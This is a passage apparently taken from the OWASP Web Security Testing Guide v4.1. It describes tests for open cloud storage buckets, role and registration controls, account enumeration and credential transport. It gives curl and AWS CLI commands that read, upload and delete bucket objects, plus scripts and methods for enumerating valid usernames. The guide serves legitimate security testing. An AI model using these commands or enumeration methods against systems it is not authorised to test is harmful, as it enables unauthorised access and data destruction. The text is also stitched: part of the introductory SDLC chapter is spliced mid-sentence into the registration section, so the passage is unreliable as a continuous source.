This may lead to an unauthorized user being able to upload new files, or to modify or read stored files.</p><p>Test Objectives</p><p>Assess whether the cloud storage service’s access control configuration is properly in place.</p><p>How to Test</p><p>First identify the URL to</p><p>access the data in the storage service, and then consider the following tests:</p><p>read the unauthorized data</p><p>upload a new arbitrary file</p><p>You may use curl for the tests with the following commands and see if unauthorized actions can be performed</p><p>successfully.</p><p>To test the ability to read an object:</p><p>curl -X GET https://<cloud-storage-service>/<object></p><p>To test the ability to upload a file:</p><p>curl -X PUT -d 'test' 'https://<cloud-storage-service>/test.txt'</p><p>Testing for Amazon S3 Bucket Misconfiguration</p><p>Amazon S3 bucket URLs follow one of two formats, either virtual hosted style or path-style.</p><p>Virtual Hosted Style Access</p><p>https://bucket-name.s3.Region.amazonaws.com/key-name</p><p>In the following example, my-bucket is the bucket name, us-west-2 is the region, and puppy.png is the key-name:</p><p>https://my-bucket.s3.us-west-2.amazonaws.com/puppy.png</p><p>Path-Style Access</p><p>https://s3.Region.amazonaws.com/bucket-name/key-name</p><p>As above, in the following example, my-bucket is the bucket name, us-west-2 is the region, and puppy.png is the</p><p>key-name:</p><p>https://s3.us-west-2.amazonaws.com/my-bucket/puppy.png</p><p>For some regions, the legacy global endpoint that does not specify a region-specific endpoint can be used. Its format is</p><p>also either virtual hosted style or path-style.</p><p>Virtual Hosted Style Access</p><p>https://bucket-name.s3.amazonaws.com</p><p>Path-Style Access</p><p>https://s3.amazonaws.com/bucket-name</p><p>Identify Bucket URL</p><p>For black-box testing, S3 URLs can be found in the HTTP messages. 
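The URL formats above can be normalized to a (bucket, region, key) triple before testing. A small Python sketch; the patterns cover only the region-specific formats shown, not the legacy global endpoint:

```python
# Parse region-specific S3 URLs into (bucket, region, key).
import re

VIRTUAL_HOSTED = re.compile(
    r"https://(?P<bucket>[^.]+)\.s3\.(?P<region>[^.]+)\.amazonaws\.com/(?P<key>.*)")
PATH_STYLE = re.compile(
    r"https://s3\.(?P<region>[^.]+)\.amazonaws\.com/(?P<bucket>[^/]+)/(?P<key>.*)")

def parse_s3_url(url: str):
    """Return (bucket, region, key), or None if the URL matches neither style."""
    for pattern in (VIRTUAL_HOSTED, PATH_STYLE):
        match = pattern.match(url)
        if match:
            return match.group("bucket"), match.group("region"), match.group("key")
    return None
```

Normalizing first makes it easy to feed the same bucket into both the curl checks above and the AWS CLI checks that follow.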
The following example shows a bucket URL</p><p>sent in an img tag in an HTTP response.</p><p>...</p><p><img src="https://my-bucket.s3.us-west-2.amazonaws.com/puppy.png"></p><p>...</p><p>For gray-box testing, you can obtain bucket URLs from Amazon’s web interface, documents, source code, or any other</p><p>available sources.</p><p>Testing with AWS CLI Tool</p><p>In addition to testing with curl, you can also test with the AWS Command Line Interface (CLI) tool. In this case the s3://</p><p>protocol is used.</p><p>List</p><p>The following command lists all the objects of the bucket when it is configured as public.</p><p>aws s3 ls s3://<bucket-name></p><p>Upload</p><p>The following is the command to upload a file:</p><p>aws s3 cp arbitrary-file s3://bucket-name/path-to-save</p><p>This example shows the result when the upload has been successful.</p><p>$ aws s3 cp test.txt s3://bucket-name/test.txt</p><p>upload: ./test.txt to s3://bucket-name/test.txt</p><p>This example shows the result when the upload has failed.</p><p>$ aws s3 cp test.txt s3://bucket-name/test.txt</p><p>upload failed: ./test.txt to s3://bucket-name/test.txt An error occurred (AccessDenied) when</p><p>calling the PutObject operation: Access Denied</p><p>Remove</p><p>The following is the command to remove an object:</p><p>aws s3 rm s3://bucket-name/object-to-remove</p><p>Tools</p><p>AWS Command Line Interface</p><p>References</p><p>Working with Amazon S3 Buckets</p><p>https://aws.amazon.com/cli/</p><p>https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingBucket.html</p><p>4.3 Identity Management Testing</p><p>4.3.1 Test Role Definitions</p><p>4.3.2 Test User Registration Process</p><p>4.3.3 Test Account Provisioning Process</p><p>4.3.4 Testing for Account Enumeration and Guessable User Account</p><p>4.3.5 Testing for Weak or Unenforced Username Policy</p><p>Test Role 
Definitions</p><p>ID</p><p>WSTG-IDNT-01</p><p>Summary</p><p>It is common in modern enterprises to define system roles to manage users and authorization to system resources. In</p><p>most system implementations it is expected that at least two roles exist: administrators and regular users. The first</p><p>represents a role that permits access to privileged and sensitive functionality and information; the second</p><p>represents a role that permits access to regular business functionality and information. Well-developed roles should</p><p>align with business processes which are supported by the application.</p><p>It is important to remember that cold, hard authorization isn’t the only way to manage access to system objects. In more</p><p>trusted environments where confidentiality is not critical, softer controls such as application workflow and audit logging</p><p>can support data integrity requirements while not restricting user access to functionality or creating complex role</p><p>structures that are difficult to manage. It’s important to consider the Goldilocks principle when role engineering, in that</p><p>defining too few, broad roles (thereby exposing access to functionality users don’t require) is as bad as too many, tightly</p><p>tailored roles (thereby restricting access to functionality users do require).</p><p>Test Objectives</p><p>Validate that the system roles defined within the application sufficiently define and separate each system and business role</p><p>to manage appropriate access to system functionality and information.</p><p>How to Test</p><p>Either with or without the help of the system developers or administrators, develop a role-versus-permission matrix.</p><p>The matrix should enumerate all the roles that can be provisioned and explore the permissions that are allowed to be</p><p>applied to the objects, including any constraints. 
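Such a matrix can also be captured as data, so that expected access decisions can be asserted mechanically during testing. A sketch follows; the roles, objects, and constraints are hypothetical, loosely modeled on the table in Example 1 below:

```python
# A role-versus-permission matrix as data (all names are hypothetical).
MATRIX = {
    ("Administrator", "read", "customer-records"): "none",
    ("Manager", "read", "customer-records"): "own-business-unit",
    ("Staff", "read", "customer-records"): "assigned-customers",
    ("Customer", "read", "customer-record"): "own-record",
}

def allowed(role: str, permission: str, obj: str) -> bool:
    """True if the matrix grants this role the permission on the object."""
    return (role, permission, obj) in MATRIX

def constraint(role: str, permission: str, obj: str):
    """The constraint under which access is granted, or None if denied."""
    return MATRIX.get((role, permission, obj))
```

Encoding the matrix this way lets the tester diff the desired access policy against what the application actually enforces.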
If a matrix is provided with the application, it should be validated by the</p><p>tester; if it doesn’t exist, the tester should generate it and determine whether the matrix satisfies the desired access</p><p>policy for the application.</p><p>Example 1</p><p>ROLE PERMISSION OBJECT CONSTRAINTS</p><p>Administrator Read Customer records</p><p>Manager Read Customer records Only records related to business unit</p><p>Staff Read Customer records Only records associated with customers assigned by Manager</p><p>Customer Read Customer record Only own record</p><p>A real-world example of role definitions can be found in the WordPress roles documentation. WordPress has six default</p><p>roles ranging from Super Admin to a Subscriber.</p><p>Example 2</p><p>Log in with administrator permissions and access pages that are intended only for administrators. Then, log in as a normal user and try to access</p><p>those administrator page URLs directly.</p><p>1. Log in as administrator</p><p>2. Visit an admin page, e.g. http://targetSite/Admin</p><p>3. Log out</p><p>4. Log in as a normal user</p><p>5. Visit the admin page URL directly: http://targetSite/Admin</p><p>Tools</p><p>While the most thorough and accurate approach to completing this test is to conduct it manually, spidering tools are</p><p>also useful. 
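The forced-browsing check in Example 2 can also be scripted by replaying the admin URL under each session and comparing status codes. A sketch; the URL and cookie values are hypothetical placeholders:

```python
# Request an admin URL under different sessions and compare the outcomes.
# The URL and cookie values used with these helpers are hypothetical.
import urllib.error
import urllib.request

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so a 302 is reported as 302."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

_OPENER = urllib.request.build_opener(_NoRedirect)

def fetch_status(url: str, session_cookie: str = "") -> int:
    """Return the HTTP status code for url, optionally with a session cookie."""
    request = urllib.request.Request(url)
    if session_cookie:
        request.add_header("Cookie", session_cookie)
    try:
        with _OPENER.open(request) as response:
            return response.status
    except urllib.error.HTTPError as err:
        return err.code

def escalation_suspected(admin_status: int, user_status: int) -> bool:
    """Flag when a normal user gets the same 200 the administrator gets."""
    return admin_status == 200 and user_status == 200
```

For example, `escalation_suspected(fetch_status(url, admin_cookie), fetch_status(url, user_cookie))`; a redirect to the login page for the normal user would surface as a 302 and not be flagged.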
Log on with each role in turn and spider the application (don’t forget to exclude the logout link from the</p><p>spidering).</p><p>References</p><p>Role Engineering for Enterprise Security Management, E Coyne & J Davis, 2007</p><p>Role engineering and RBAC standards</p><p>Remediation</p><p>Remediation of the issues can take the following forms:</p><p>Role Engineering</p><p>Mapping of business roles to system roles</p><p>Separation of Duties</p><p>https://www.zaproxy.org/docs/desktop/start/features/spider/</p><p>https://www.bookdepository.co.uk/Role-Engineering-for-Enterprise-Security-Management-Edward-Coyne/9781596932180</p><p>https://csrc.nist.gov/projects/role-based-access-control#rbac-standard</p><p>Web Security Testing Guide v4.1</p><p>130</p><p>Test User Registration Process</p><p>ID</p><p>WSTG-IDNT-02</p><p>Summary</p><p>Some websites offer a user registration process that automates (or semi-automates) the provisioning of system access</p><p>to users. The identity requirements for access vary from positive identification to none at all, depending on the security</p><p>requirements of the system. Many public applications completely automate the registration and provisioning process</p><p>because the size of the user base makes it impossible to manage manually. However, many corporate applications will</p><p>provision users manually, so this test case may not apply.</p><p>Test Objectives</p><p>1. Verify that the identity requirements for user registration are aligned with business and security requirements.</p><p>2. Validate the registration process.</p><p>How to Test</p><p>Verify that the identity requirements for user registration are aligned with business and security requirements:</p><p>1. Can anyone register for access?</p><p>2. Are registrations vetted by a human prior to provisioning, or are they automatically granted if the criteria are</p><p>used in your environment,</p><p>it is time to pick one! 
The following figure shows a generic SDLC model as well as the (estimated) increasing cost of</p><p>fixing security bugs in such a model.</p><p>Web Security Testing Guide v4.1</p><p>11</p><p>Figure 2-1: Generic SDLC Model</p><p>Companies should inspect their overall SDLC to ensure that security is an integral part of the development process.</p><p>SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the</p><p>development process.</p><p>What to Test?</p><p>It can be helpful to think of software development as a combination of people, process, and technology. If these are the</p><p>factors that “create” software, then it is logical that these are the factors that must be tested. Today most people</p><p>generally test the technology or the software itself.</p><p>An effective testing program should have components that test the following:</p><p>People – to ensure that there is adequate education and awareness;</p><p>Process – to ensure that there are adequate policies and standards and that people know how to follow these policies;</p><p>Technology – to ensure that the process has been effective in its implementation.</p><p>Web Security Testing Guide v4.1</p><p>12</p><p>Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover</p><p>management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an</p><p>organization can catch issues that would later manifest themselves into defects in the technology, thus eradicating bugs</p><p>early and identifying the root causes of defects. 
Likewise, testing only some of the technical issues that can be present</p><p>in a system will result in an incomplete and inaccurate security posture assessment.</p><p>Denis Verdon, Head of Information Security at Fidelity National Financial, presented an excellent analogy for this</p><p>misconception at the OWASP AppSec 2004 Conference in New York:</p><p>If cars were built like applications … safety tests would assume frontal impact only. Cars would not be roll tested,</p><p>or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft.</p><p>Feedback and Comments</p><p>As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being</p><p>used and that it is effective and accurate.</p><p>Principles of Testing</p><p>There are some common misconceptions when developing a testing methodology to find security bugs in software.</p><p>This chapter covers some of the basic principles that professionals should take into account when performing security</p><p>tests on software.</p><p>There is No Silver Bullet</p><p>While it is tempting to think that a security scanner or application firewall will provide many defenses against attack or</p><p>identify a multitude of problems, in reality there is no silver bullet to the problem of insecure software. Application</p><p>security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective</p><p>at in-depth assessments or providing adequate test coverage. Remember that security is a process and not a product.</p><p>Think Strategically, Not Tactically</p><p>Security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in</p><p>information security during the 1990’s. The patch-and-penetrate model involves fixing a reported bug, but without</p><p>proper investigation of the root cause. 
This model is usually associated with the window of vulnerability, also referred to</p><p>as window of exposure, shown in the figure below. The evolution of vulnerabilities in common software used worldwide</p><p>has shown the ineffectiveness of this model. For more information about windows of exposure, see Schneier on</p><p>Security.</p><p>Vulnerability studies such as Symantec’s Internet Security Threat Report have shown that with the reaction time of</p><p>attackers worldwide, the typical window of vulnerability does not provide enough time for patch installation, since the</p><p>time between a vulnerability being uncovered and an automated attack against it being developed and released is</p><p>decreasing every year.</p><p>There are several incorrect assumptions in the patch-and-penetrate model. Many users believe that patches interfere</p><p>with normal operations or might break existing applications. It is also incorrect to assume that all users are aware of</p><p>newly released patches. Consequently not all users of a product will apply patches, either because they think patching</p><p>may interfere with how the software works, or because they lack knowledge about the existence of the patch.</p><p>https://www.fnf.com/</p><p>https://www.schneier.com/crypto-gram/archives/2000/0915.html</p><p>https://www.symantec.com/security-center/threat-report</p><p>Web Security Testing Guide v4.1</p><p>13</p><p>Figure 2-2: Window of Vulnerability</p><p>It is essential to build security into the Software Development Life Cycle (SDLC) to prevent reoccurring security</p><p>problems within an application. Developers can build security into the SDLC by developing standards, policies, and</p><p>guidelines that fit and work within the development methodology. 
Threat modeling and other techniques should be</p><p>used to help assign appropriate resources to those parts of a system that are most at risk.</p><p>The SDLC is King</p><p>The SDLC is a process that is well-known to developers. By integrating security into each phase of the SDLC, it allows</p><p>for a holistic approach to application security that leverages the procedures already in place within the organization. Be</p><p>aware that while the names of the various phases may change depending on the SDLC model used by an</p><p>organization, each conceptual phase of the archetype SDLC will be used to develop the application (i.e., define,</p><p>design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing</p><p>process, to ensure a cost-effective and comprehensive security program.</p><p>There are several secure SDLC frameworks in existence that provide both descriptive and prescriptive advice. Whether</p><p>a person takes descriptive or prescriptive advice depends on the maturity of the SDLC process. Essentially, prescriptive</p><p>advice shows how the secure SDLC should work, and descriptive advice shows how it is used in the real world. Both</p><p>have their place. For example, if you don’t know where to start, a prescriptive framework can provide a menu of</p><p>potential security controls that can be applied within the SDLC. Descriptive advice can then help drive the decision</p><p>process by presenting what has worked well for other organizations. Descriptive secure SDLCs include BSIMM-V; and</p><p>the prescriptive secure SDLCs include OWASP’s Open Software Assurance Maturity Model (OpenSAMM) and ISO/IEC</p><p>27034 Parts 1-8, parts of which are still in development.</p><p>Test Early and Test Often</p><p>When a bug is detected early within the SDLC it can be addressed faster and at a lower cost. A security bug is no</p><p>different from a functional or performance-based bug in this regard. 
A key step in making this possible is to educate the</p><p>development and QA teams about common security issues and the ways to detect and prevent them. Although new</p><p>libraries, tools, or languages can help design programs with fewer security bugs, new threats arise constantly and</p><p>developers must be aware of the threats that affect the software they are developing. Education in security testing also</p><p>helps developers acquire the appropriate mindset to test an application from an attacker’s perspective. This allows</p><p>each organization to consider security issues as part of their existing responsibilities.</p><p>Understand the Scope of Security</p><p>It is important to know how much security a given project will require. The assets that are to be protected should be</p><p>given a classification that states how they are to be handled (e.g., confidential, secret, top secret). Discussions should</p><p>https://www.opensamm.org/</p><p>occur with legal counsel to ensure that any specific security requirements will be met. In the USA, requirements might</p><p>come from federal regulations,</p><p>met?</p><p>3. Can the same person or identity register multiple times?</p><p>4. Can users register for different roles or permissions?</p><p>5. What proof of identity is required for a registration to be successful?</p><p>6. Are registered identities verified?</p><p>Validate the registration process:</p><p>1. Can identity information be easily forged or faked?</p><p>2.
Can the exchange of identity information be manipulated during registration?</p><p>Example</p><p>In the WordPress example below, the only identification requirement is an email address that is accessible to the</p><p>registrant.</p><p>Figure 4.3.2-1: WordPress Registration Page</p><p>In contrast, in the Google example below the identification requirements include name, date of birth, country, mobile</p><p>phone number, email address and CAPTCHA response. While only two of these can be verified (email address and</p><p>mobile number), the identification requirements are stricter than WordPress’s.</p><p>Figure 4.3.2-2: Google Registration Page</p><p>Tools</p><p>An HTTP proxy can be a useful tool to test this control.</p><p>References</p><p>User Registration Design</p><p>Remediation</p><p>Implement identification and verification requirements that correspond to the security requirements of the information</p><p>the credentials protect.</p><p>https://mashable.com/2011/06/09/user-registration-design/</p><p>Test Account Provisioning Process</p><p>ID</p><p>WSTG-IDNT-03</p><p>Summary</p><p>The provisioning of accounts presents an opportunity for an attacker to create a valid account without application of the</p><p>proper identification and authorization process.</p><p>Test Objectives</p><p>Verify which accounts may provision other accounts and of what type.</p><p>How to Test</p><p>Determine which roles are able to provision users and what sort of accounts they can provision.</p><p>Is there any verification, vetting and authorization of provisioning requests?</p><p>Is there any verification, vetting and authorization of de-provisioning requests?</p><p>Can an administrator provision other administrators or just users?</p><p>Can an administrator or other user provision accounts with privileges greater than their own?</p><p>Can an administrator or user de-provision
themselves?</p><p>How are the files or resources owned by the de-provisioned user managed? Are they deleted? Is access</p><p>transferred?</p><p>Example</p><p>In WordPress, only a user’s name and email address are required to provision the user, as shown below:</p><p>Figure 4.3.3-1: WordPress User Add</p><p>De-provisioning of users requires the administrator to select the users to be de-provisioned, select Delete from the</p><p>dropdown menu (circled) and then apply this action. The administrator is then presented with a dialog box asking</p><p>what to do with the user’s posts (delete or transfer them).</p><p>Figure 4.3.3-2: WordPress Auth and Users</p><p>Tools</p><p>While the most thorough and accurate approach to completing this test is to conduct it manually, HTTP proxy tools</p><p>could also be useful.</p><p>Testing for Account Enumeration and Guessable User</p><p>Account</p><p>ID</p><p>WSTG-IDNT-04</p><p>Summary</p><p>The scope of this test is to verify if it is possible to collect a set of valid usernames by interacting with the authentication</p><p>mechanism of the application. This test will be useful for brute force testing, in which the tester verifies if, given a valid</p><p>username, it is possible to find the corresponding password.</p><p>Often, web applications reveal when a username exists on the system, either as a consequence of misconfiguration or as</p><p>a design decision. For example, sometimes, when we submit wrong credentials, we receive a message that states that</p><p>either the username is present on the system or the provided password is wrong. The information obtained can be</p><p>used by an attacker to gain a list of users on the system.
This information can be used to attack the web application, for</p><p>example, through a brute force or default username and password attack.</p><p>The tester should interact with the authentication mechanism of the application to understand if sending particular</p><p>requests causes the application to answer in different manners. This issue exists because the information released</p><p>by the web application or web server when the user provides a valid username is different from when they use an invalid</p><p>one.</p><p>In some cases, a message is received that reveals if the provided credentials are wrong because an invalid username</p><p>or an invalid password was used. Sometimes, testers can enumerate the existing users by sending a username and an</p><p>empty password.</p><p>How to Test</p><p>In black-box testing, the tester knows nothing about the specific application, username, application logic, error</p><p>messages on the log in page, or password recovery facilities. If the application is vulnerable, the tester receives a response</p><p>message that reveals, directly or indirectly, some information useful for enumerating users.</p><p>HTTP Response Message</p><p>Testing for Valid User/Right Password</p><p>Record the server answer when you submit a valid user ID and valid password.</p><p>Using a web proxy, notice the information retrieved from this successful authentication (HTTP 200 Response,</p><p>length of the response).</p><p>Testing for Valid User with Wrong Password</p><p>Now, the tester should try to insert a valid user ID and a wrong password and record the error message generated by</p><p>the application.</p><p>The browser should display a message similar to the following one:</p><p>Figure 4.3.4-1: Authentication Failed</p><p>or something like:</p><p>Figure 4.3.4-2: No Configuration Found</p><p>Check for any message that reveals the existence of a user, for instance, a message similar to:</p><p>Login for User foo:
invalid password</p><p>Using a web proxy, notice the information retrieved from this unsuccessful authentication attempt (HTTP 200</p><p>Response, length of the response).</p><p>Testing for a Nonexistent Username</p><p>Now, the tester should try to insert an invalid user ID and a wrong password and record the server answer (the tester</p><p>should be confident that the username is not valid in the application). Record the error message and the server answer.</p><p>If the tester enters a nonexistent user ID, they can receive a message similar to:</p><p>Figure 4.3.4-3: This User is Not Active</p><p>or a message like the following one:</p><p>Login failed for User foo: invalid Account</p><p>Generally the application should respond with the same error message and length to the different incorrect</p><p>requests. If the responses are not the same, the tester should investigate and find out the key that creates a</p><p>difference between the two responses. For example:</p><p>Client request: Valid user/wrong password</p><p>Server answer: ‘The password is not correct’</p><p>Client request: Wrong user/wrong password</p><p>Server answer: ‘User not recognized’</p><p>The above responses let the client understand that for the first request they have a valid username. So they can</p><p>interact with the application requesting a set of possible user IDs and observing the answer.</p><p>Looking at the second server response, the tester understands in the same way that they don’t hold a valid</p><p>username.
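</p><p>This comparison lends itself to automation. The sketch below is illustrative only: in a real test the status codes and bodies would come from a web proxy or HTTP client, whereas here they are hard-coded stand-ins for the responses described above. It fingerprints each failed-login response and flags usernames whose response differs from a baseline recorded for a username known not to exist:</p><p>

```python
# Fingerprint failed-login responses to spot usernames that produce a
# different answer than a known-invalid username (likely valid accounts).

def fingerprint(status, body):
    """Reduce a response to a comparable fingerprint: status, length, text."""
    return (status, len(body), body.strip().lower())

def enumerate_users(baseline, candidates):
    """Return candidate usernames whose response differs from the baseline.

    baseline   -- (status, body) recorded for a username known NOT to exist
    candidates -- dict mapping username -> (status, body)
    """
    base = fingerprint(*baseline)
    return [user for user, (status, body) in candidates.items()
            if fingerprint(status, body) != base]

# Illustrative responses: 'foo' triggers the "invalid password" variant,
# so it is likely a valid account name; 'bar' matches the baseline.
baseline = (200, "User not recognized")
responses = {
    "foo": (200, "Login for User foo: invalid password"),
    "bar": (200, "User not recognized"),
}
print(enumerate_users(baseline, responses))  # -> ['foo']
```

In practice the fingerprint could also include response headers or redirect targets; the point is simply to diff each probe against the known-invalid baseline.</p><p>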
So they can interact in the same manner and create a list of valid user IDs by looking at the server answers.</p><p>Other Ways to Enumerate Users</p><p>Testers can enumerate users in several ways, such as:</p><p>Analyzing the Error Code Received on Login Pages</p><p>Some web applications release a specific error code or message that we can analyze.</p><p>Analyzing URLs and URL Redirections</p><p>For example:</p><p>http://www.foo.com/err.jsp?User=baduser&Error=0</p><p>http://www.foo.com/err.jsp?User=gooduser&Error=2</p><p>As seen above, when a tester provides a user ID and password to the web application, they see a message</p><p>indicating that an error has occurred in the URL. In the first case they have provided a bad user ID and bad password.</p><p>In the second, a good user ID and a bad password, so they can identify a valid user ID.</p><p>URI Probing</p><p>Sometimes a web server responds differently if it receives a request for an existing directory or not. For instance in</p><p>some portals every user is associated with a directory. If testers try to access an existing directory they could receive a</p><p>web server error.</p><p>Some of the common errors received from web servers are:</p><p>403 Forbidden error code</p><p>404 Not found error code</p><p>Example:</p><p>http://www.foo.com/account1 - we receive from web server: 403 Forbidden</p><p>http://www.foo.com/account2 - we receive from web server: 404 File Not Found</p><p>In the first case the user exists, but the tester cannot view the web page; in the second case the user “account2”</p><p>does not exist.
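</p><p>The 403/404 distinction just described can be scripted. The sketch below uses hard-coded status codes as stand-ins for real server responses (the usernames and codes mirror the example above); the mapping itself is server-specific and would need to be calibrated per target:</p><p>

```python
# Classify candidate per-user directories by HTTP status code.
# 403 suggests the directory (and hence the user) exists but is forbidden;
# 404 suggests it does not exist. Other codes need manual analysis.

def classify(status_code):
    if status_code == 403:
        return "user likely exists (forbidden)"
    if status_code == 404:
        return "user does not exist"
    return "inconclusive"

# Stand-in results of probing http://www.foo.com/<username>
probes = {"account1": 403, "account2": 404}
for user, status in probes.items():
    print(user, "->", classify(status))
```

</p><p>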
By collecting this information testers can enumerate the users.</p><p>Analyzing Web Page Titles</p><p>Testers can receive useful information from the title of the web page, where they can obtain a specific error code or message</p><p>that reveals if the problems are with the username or password.</p><p>For instance, if a user cannot authenticate to an application and receives a web page whose title is similar to:</p><p>Invalid user</p><p>Invalid authentication</p><p>Analyzing a Message Received from a Recovery Facility</p><p>When we use a recovery facility (i.e. a forgotten password function) a vulnerable application might return a message</p><p>that reveals if a username exists or not.</p><p>For example, messages similar to the following:</p><p>Invalid username: e-mail address is not valid or the specified user was not found.</p><p>Valid username: Your password has been successfully sent to the email address you registered with.</p><p>Friendly 404 Error Message</p><p>When we request a user within a directory that does not exist, we don’t always receive a 404 error code. Instead, we</p><p>may receive a “200 OK” response with an image; in this case we can assume that when we receive the specific image the user does</p><p>not exist. This logic can be applied to other web server responses; the trick is a good analysis of web server and web</p><p>application messages.</p><p>Analyzing Response Times</p><p>As well as looking at the content of the responses, the time that the response takes should also be considered.</p><p>Particularly where the request causes an interaction with an external service (such as sending a forgotten password</p><p>email), this can add several hundred milliseconds to the response, which can be used to determine whether the</p><p>requested user is valid.</p><p>Guessing Users</p><p>In some cases the user IDs are created according to specific policies of the administrator or company.
For example we can view a</p><p>user with a user ID created in sequential order:</p><p>CN000100</p><p>CN000101</p><p>...</p><p>Sometimes the usernames are created with a REALM alias and then sequential numbers:</p><p>R1001 – user 001 for REALM1</p><p>R2001 – user 001 for REALM2</p><p>In the above sample we can create simple shell scripts that compose user IDs and submit a request with a tool like wget</p><p>to automate a web query to discern valid user IDs. To create a script we can also use Perl and cURL.</p><p>Other possibilities are:</p><p>- user IDs associated with credit card numbers, or in general numbers with a pattern.</p><p>- user IDs associated with real names, e.g. if Freddie Mercury has a user ID of “fmercury”, then you might guess Roger Taylor to</p><p>have the user ID of “rtaylor”.</p><p>Again, we can guess a username from the information received from an LDAP query or from Google information</p><p>gathering, for example, from a specific domain. Google can help to find domain users through specific queries or</p><p>through a simple shell script or tool.</p><p>Be aware that by enumerating user accounts, you risk locking out accounts after a predefined number of failed probes (based on</p><p>application policy). Also, sometimes, your IP address can be banned by dynamic rules on the application firewall</p><p>or Intrusion Prevention System.</p><p>Gray-Box Testing</p><p>Testing for Authentication Error Messages</p><p>Verify that the application answers in the same manner for every client request that produces a failed authentication.</p><p>For this issue, black-box testing and gray-box testing have the same concept, based on the analysis of messages or</p><p>error codes received from the web application.</p><p>The application should answer in the same manner for every failed attempt of authentication.
For example:</p><p>Credentials submitted are not valid</p><p>Tools</p><p>OWASP Zed Attack Proxy (ZAP)</p><p>cURL</p><p>Perl</p><p>References</p><p>Marco Mella, Sun Java Access & Identity Manager Users enumeration</p><p>Username Enumeration Vulnerabilities</p><p>Remediation</p><p>Ensure the application returns consistent generic error messages in response to invalid account name, password or</p><p>other user credentials entered during the log in process.</p><p>https://www.zaproxy.org/</p><p>https://curl.haxx.se/</p><p>https://www.perl.org/</p><p>https://securiteam.com/exploits/5ep0f0uquo/</p><p>https://www.gnucitizen.org/blog/username-enumeration-vulnerabilities/</p><p>Ensure default system accounts and test accounts are deleted prior to releasing the system into production (or</p><p>exposing it to an untrusted network).</p><p>Testing for Weak or Unenforced Username Policy</p><p>ID</p><p>WSTG-IDNT-05</p><p>Summary</p><p>User account names are often highly structured (e.g.
Joe Bloggs’ account name is jbloggs and Fred Nurks’ account</p><p>name is fnurks) and valid account names can easily be guessed.</p><p>Test Objectives</p><p>Determine whether a consistent account name structure renders the application vulnerable to account enumeration.</p><p>Determine whether the application’s error messages permit account enumeration.</p><p>How to Test</p><p>Determine the structure of account names.</p><p>Evaluate the application’s response to valid and invalid account names.</p><p>Use different responses to valid and invalid account names to enumerate valid account names.</p><p>Use account name dictionaries to enumerate valid account names.</p><p>Remediation</p><p>Ensure the application returns consistent generic error messages in response to invalid account name, password or</p><p>other user credentials entered during the log in process.</p><p>4.4 Authentication Testing</p><p>4.4.1 Testing for Credentials Transported over an Encrypted Channel</p><p>4.4.2 Testing for Default Credentials</p><p>4.4.3 Testing for Weak Lock Out Mechanism</p><p>4.4.4 Testing for Bypassing Authentication Schema</p><p>4.4.5 Testing for Vulnerable Remember Password</p><p>4.4.6 Testing for Browser Cache Weaknesses</p><p>4.4.7 Testing for Weak Password Policy</p><p>4.4.8 Testing for Weak Security Question Answer</p><p>4.4.9 Testing for Weak Password Change or Reset Functionalities</p><p>4.4.10 Testing for Weaker Authentication in Alternative Channel</p><p>Testing for Credentials Transported over an Encrypted</p><p>Channel</p><p>ID</p><p>WSTG-ATHN-01</p><p>Summary</p><p>Testing for credentials transport means verifying that the user’s authentication data are transferred via an encrypted</p><p>channel to avoid being intercepted by malicious users.
The analysis focuses simply on trying to understand if the data</p><p>travels unencrypted from the web browser to the server, or if the web application takes the appropriate security</p><p>measures using a protocol like HTTPS. The HTTPS protocol is built on TLS/SSL to encrypt the data that is transmitted</p><p>and to ensure that the user is being sent towards the desired site.</p><p>Clearly, the fact that traffic is encrypted does not necessarily mean that it’s completely safe. The security also depends</p><p>on the encryption algorithm used and the robustness of the keys that the application is using, but this particular topic</p><p>will not be addressed in this section.</p><p>For a more detailed discussion on testing the safety of TLS/SSL channels refer to the chapter Testing for Weak SSL TLS</p><p>Ciphers Insufficient Transport Layer Protection. Here, the tester will just try to understand if the data that users put into</p><p>web forms in order to log in to a web site is transmitted using secure protocols that protect it from an attacker.</p><p>Nowadays, the most common example of this issue is the log in page of a web application. The tester should verify that</p><p>the user’s credentials are transmitted via an encrypted channel. In order to log in to a web site, the user usually has to fill in a</p><p>simple form that transmits the inserted data to the web application with the POST method. What is less obvious is that</p><p>this data can be passed using the HTTP protocol, which transmits the data in a non-secure, clear text form, or using the</p><p>HTTPS protocol, which encrypts the data during the transmission. To further complicate things, there is the possibility</p><p>that the site has the login page accessible via HTTP (making us believe that the transmission is insecure), but then it</p><p>actually sends data via HTTPS.
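</p><p>A quick first check for this situation can be automated: parse the login page and inspect the scheme of each form’s action URL. The sketch below uses only the Python standard library; the HTML fragment and URLs are made-up examples. Note that an HTTPS action on a page served over plain HTTP still deserves a finding, as discussed further below:</p><p>

```python
# Extract form action URLs from a login page and check whether each
# resolved action uses HTTPS. Pure parsing; fetching the page is out of
# scope for this sketch.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormActionFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action", ""))

def check_login_page(page_url, html):
    """Return [(resolved_action_url, uses_https)] for each form on the page."""
    parser = FormActionFinder()
    parser.feed(html)
    results = []
    for action in parser.actions:
        target = urljoin(page_url, action)  # resolve relative actions
        results.append((target, urlparse(target).scheme == "https"))
    return results

# Made-up example: page served over HTTP, but the form posts to HTTPS.
html = '<form action="https://www.example.com/login.do" method="post"></form>'
print(check_login_page("http://www.example.com/homepage.do", html))
```

Even when this reports `uses_https == True`, the page itself being reachable over HTTP leaves the deployment exposed to stripping attacks, so both the page scheme and the action scheme should be recorded.</p><p>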
